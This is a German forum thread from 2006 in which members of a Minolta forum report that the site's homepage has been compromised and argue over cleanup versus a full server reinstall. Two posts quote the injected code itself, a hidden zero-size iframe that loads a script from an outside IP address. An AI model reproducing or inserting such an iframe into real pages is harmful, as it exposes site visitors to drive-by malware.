RE: Software-Update

#436 von Gelöschtes Mitglied , 15.09.2006 07:38

ZITAt (Michael H @ 2006-09-15, 7:20) Erinnerung: Auf der Hauptseite steht ist immer noch der Schadcode:

1
 
<!-- 1158297517 --><iframe src=http://81.95.146.90/dispatch.php?src=minolta width=0 height=0 border=0></iframe>
 

[/quote]
Hallo Michael
Beziehst du die Homepage via Proxi-Server? Mach mal <Ctrl> + <F5>, dann sollte die Webseite auch auf dem Proxi neu geladen werden.
Grund: Ich sehe im Quellentext keinen "iframe" - Eintrag.

Gruss
Peter

Edit: Da war Frank schneller! Danke!




RE: Software-Update

#437 von ingobohn , 15.09.2006 08:07

ZITAt (Frank @ 2006-09-15, 7:35) ZITAt (Michael H @ 2006-09-15, 7:20)
Erinnerung: Auf der Hauptseite steht ist immer noch der Schadcode:

1
 
&#60;&#33;-- 1158297517 --&#62;&#60;iframe src=http&#58;//81&#46;95&#46;146&#46;90/dispatch&#46;php?src=minolta width=0 height=0 border=0&#62;&#60;/iframe&#62;
 

[/quote]

Danke für den Hinweis, Michael! Sollte nun auf wieder behoben sein.
[/quote]
Nein, zumindest bei mir meldet Firefox und NoScript immer noch einen versuchten Zugriff auf o.g. IP-Adresse.



ingobohn  
ingobohn
Beiträge: 11.247
Registriert am: 03.11.2003


RE: Software-Update

#438 von ingobohn , 15.09.2006 08:09

ZITAt (Snooper @ 2006-09-15, 1:29) ...der/die/das Witzbold scheint sich nun auch die Galerie vorgenommen zu haben...[/quote]
/blink.gif" style="vertical-align:middle" emoid="" border="0" alt="blink.gif" /> Helft mir mal auf die Sprünge - von was redet ihr? /blink.gif" style="vertical-align:middle" emoid="" border="0" alt="blink.gif" />



ingobohn  
ingobohn
Beiträge: 11.247
Registriert am: 03.11.2003


RE: Software-Update

#439 von co2 , 15.09.2006 08:43

Wahrscheinlich nützt es nichts, aber ich schreibe es trotzdem wieder mal. Ich habe den Eindruck, dass ihr primär die Symptome des Einbruchs bekämpft, während vielleicht die Sicherheitslöcher eventuell installierte Backdoors bestehen bleiben. Vielleicht habt ihr keine Zeit, den Server neu aufzusetzen, ich weiss, dass es in dem Forum Leute gibt, die das machen können. Scheinbar habt ihr aber lieber regelmässig Wurmschleudern auf euren Seiten...



co2  
co2
Beiträge: 518
Registriert am: 05.05.2005


RE: Software-Update

#440 von thobo ( Gast ) , 15.09.2006 12:25

ZITAt (co2 @ 2006-09-15, 8:43) Wahrscheinlich nützt es nichts, aber ich schreibe es trotzdem wieder mal. Ich habe den Eindruck, dass ihr primär die Symptome des Einbruchs bekämpft, während vielleicht die Sicherheitslöcher eventuell installierte Backdoors bestehen bleiben. Vielleicht habt ihr keine Zeit, den Server neu aufzusetzen, ich weiss, dass es in dem Forum Leute gibt, die das machen können. Scheinbar habt ihr aber lieber regelmässig Wurmschleudern auf euren Seiten...[/quote]
Wenn Du mit "Server neu aufsetzen" eine Neuinstallation des Betriebssystems und der Dienste (HTTP, etc.) meinst, dann wäre das Zeitverschwendung, ausser wenn der Schadcode durch eine Lücke in diesen Komponenten eingeschleust worden wäre. Zudem hat man je nach Hosting-Angebot keinen Zugriff darauf. Das Minolta-Forum läuft auf einem Apache-vhost, ja?



thobo

RE: Software-Update

#441 von HorstE , 15.09.2006 16:13

Ist das neu oder ist das ein Fehler? Wenn ich nicht eingeloggt bin, werden seit einigen Tagen die Smilies bei mir als Link dargestellt.
Beispiel:
(IMG:style_emoticons/default/blink.gif) Helft mir mal auf die Sprünge - von was redet ihr? (IMG:style_emoticons/default/blink.gif)
Klicke ich die Links an, erscheinen die Smilies.

Bin ich aber eingeloggt, dann sind die Smilies sofort sichtbar...

Wenn ich nicht eingeloggt bin, fehlen auch die Bilder der User.

Ist das so beabsichtigt oder ist das ein Fehler? (evtl. auch bei mir). Bin mir aber nicht bewußt, bei mit etwas verstellt zu haben (ich meine an meinem Computer, nicht direkt bei mir...)

Gruß Horst



HorstE  
HorstE
Beiträge: 642
Registriert am: 22.03.2004


RE: Software-Update

#442 von Michael H , 15.09.2006 19:12

Irgendwas ist da auf der Hauptseite wieder im Gange, oder ihr habt den Server kaputtrepariert:

Ganz am Ende:

1
2
3
4
5
6
7
8
9
10
11
12
13
 
&#60;&#33;-- 1158340212 --&#62;
// displays queries performed for page
if &#40;&#036;mosConfig_debug&#41; {
&#91;nbsp&#93;&#91;/nbsp&#93;&#91;nbsp&#93;&#91;/nbsp&#93;echo &#036;database-&#62;_ticker &#46; &#39; queries executed&#39;;
&#91;nbsp&#93;&#91;/nbsp&#93;&#91;nbsp&#93;&#91;/nbsp&#93;echo &#39;&#60;pre&#62;&#39;;
&#91;nbsp&#93;&#91;/nbsp&#93;&#91;nbsp&#93;&#91;/nbsp&#93;foreach &#40;&#036;database-&#62;_log as &#036;k=&#62;&#036;sql&#41; {
&#91;nbsp&#93;&#91;/nbsp&#93;&#91;nbsp&#93;&#91;/nbsp&#93;&#91;nbsp&#93;&#91;/nbsp&#93;&#91;nbsp&#93;&#91;/nbsp&#93;echo &#036;k+1 &#46; &#34;&#092;n&#34; &#46; &#036;sql &#46; &#39;&#60;hr /&#62;&#39;;
&#91;nbsp&#93;&#91;/nbsp&#93;&#91;nbsp&#93;&#91;/nbsp&#93;}
&#91;nbsp&#93;&#91;/nbsp&#93;&#91;nbsp&#93;&#91;/nbsp&#93;echo &#39;&#60;/pre&#62;&#39;;
}
 
doGzip&#40;&#41;;
?&#62;
 



Michael H  
Michael H
Beiträge: 2.167
Registriert am: 28.03.2005


RE: Software-Update

#443 von co2 , 15.09.2006 19:59

ZITATWenn Du mit "Server neu aufsetzen" eine Neuinstallation des Betriebssystems und der Dienste (HTTP, etc.) meinst, dann wäre das Zeitverschwendung, ausser wenn der Schadcode durch eine Lücke in diesen Komponenten eingeschleust worden wäre. Zudem hat man je nach Hosting-Angebot keinen Zugriff darauf. Das Minolta-Forum läuft auf einem Apache-vhost, ja?[/quote]
Ich habe im Ohr, dass für das Forum ein root Server gemietet wurde. Dummerweise kann auch Schadcode vom Apache aus das System verunreinigen und dort ein Backdoor etc installieren. Zugegebenermassen ist die Chance recht klein, dass gemacht wurde, wenn man aber auf der sicheren Seite sein will, ist das keine Zeitverschwendung.
Den Inhalt des Webverzeichnisses zu löschen und die Applikationen aus sicheren Quellen inkl. aktuellen Patches neu zu installieren (bzw von solchen Quellen diff's drüberlaufen zu lassen) halte ich überhaupt nicht für Zeitverschwendung.



co2  
co2
Beiträge: 518
Registriert am: 05.05.2005


RE: Software-Update

#444 von matthiaspaul , 15.09.2006 21:20

ZITAt (HorstE @ 2006-09-15, 16:13) Ist das neu oder ist das ein Fehler? Wenn ich nicht eingeloggt bin, werden seit einigen Tagen die Smilies bei mir als Link dargestellt.
[...]
Ist das so beabsichtigt oder ist das ein Fehler?[/quote]
Das ist im Moment von uns aus so beabsichtigt - keine Sorge.

Viele Grüße,

Matthias



matthiaspaul  
matthiaspaul
Beiträge: 14.595
Registriert am: 08.06.2004


RE: Software-Update

#445 von thobo ( Gast ) , 15.09.2006 22:19

ZITAt (co2 @ 2006-09-15, 19:59) Ich habe im Ohr, dass für das Forum ein root Server gemietet wurde.[/quote]
Dann ist der Zugriff natürlich gewährleistet.

ZITATDummerweise kann auch Schadcode vom Apache aus das System verunreinigen und dort ein Backdoor etc installieren.[/quote]
Genau das habe ich geschrieben: "[...] Lücke in diese Komponenten [Betriebssystem und Dienste (=Services)] [...]".

ZITATZugegebenermassen ist die Chance recht klein, dass gemacht wurde, wenn man aber auf der sicheren Seite sein will, ist das keine Zeitverschwendung. Den Inhalt des Webverzeichnisses zu löschen und die Applikationen aus sicheren Quellen inkl. aktuellen Patches neu zu installieren (bzw von solchen Quellen diff's drüberlaufen zu lassen) halte ich überhaupt nicht für Zeitverschwendung.[/quote]
"[...] wenn man aber auf der sicheren Seite sein will [...]" ist in Windowshausen, Redmondistan. Entweder man weiss, was kompromittiert wurde, oder man weiss es nicht. Sonst hätten die Administratoren in den letzten Monaten den Server etliche Male "neu aufsetzen" müssen. So arbeitet man in keiner "Produktivumgebung".



thobo

RE: Software-Update

#446 von co2 , 16.09.2006 07:58

ZITATwenn der Schadcode durch eine Lücke in diesen Komponenten eingeschleust worden wäre.[/quote]
Lässt die Interpretation zu, dass du meinst, dass der Einbruch nicht über eine Lücke in einer Webapplikation geschehen ist...

ZITAT"[...] wenn man aber auf der sicheren Seite sein will [...]" ist in Windowshausen, Redmondistan. Entweder man weiss, was kompromittiert wurde, oder man weiss es nicht. Sonst hätten die Administratoren in den letzten Monaten den Server etliche Male "neu aufsetzen" müssen. So arbeitet man in keiner "Produktivumgebung".[/quote]
Es gibt auch die Systeme mit einer Vielzahl von ungepatchten Applikationen, so dass es sich gar nicht lohnt, herauszufinden, woher der Angreifer kam. Dann kann es durchaus sinnvoll sein, das alte System komplett zu spülen und mit einer neuen Installation neu anzufangen.



co2  
co2
Beiträge: 518
Registriert am: 05.05.2005


RE: Software-Update

#447 von thobo ( Gast ) , 16.09.2006 11:50

ZITAt (co2 @ 2006-09-16, 7:58) Lässt die Interpretation zu, dass du meinst, dass der Einbruch nicht über eine Lücke in einer Webapplikation geschehen ist...[/quote]
Bezeichnet es explizit...

ZITATEs gibt auch die Systeme mit einer Vielzahl von ungepatchten Applikationen,so dass es sich gar nicht lohnt, herauszufinden, woher der Angreifer kam.[/quote]
Und Du denkst, dass sei hier der Fall?

ZITATDann kann es durchaus sinnvoll sein, das alte System komplett zu spülen und mit einer neuen Installation neu anzufangen.[/quote]
Hast Du das schon mal machen müssen? Ich habe auch schon solche Server gesehen - die wurden von Leuten betrieben, die es lieber lassen sollten.



thobo

RE: Software-Update

#448 von co2 , 16.09.2006 16:54

ZITATUnd Du denkst, dass sei hier der Fall?[/quote]
Angesichts der vielen Einbrüche beginne ich langsam dies zu vermuten.

[EDIT: Thema abgespalten durch Moderator.]



co2  
co2
Beiträge: 518
Registriert am: 05.05.2005


   


  • Ähnliche Themen
    Antworten
    Zugriffe
    Letzter Beitrag
| 2002- © so-fo.de | minolta-forum.de |
Xobor Einfach ein eigenes Forum erstellen
Datenschutz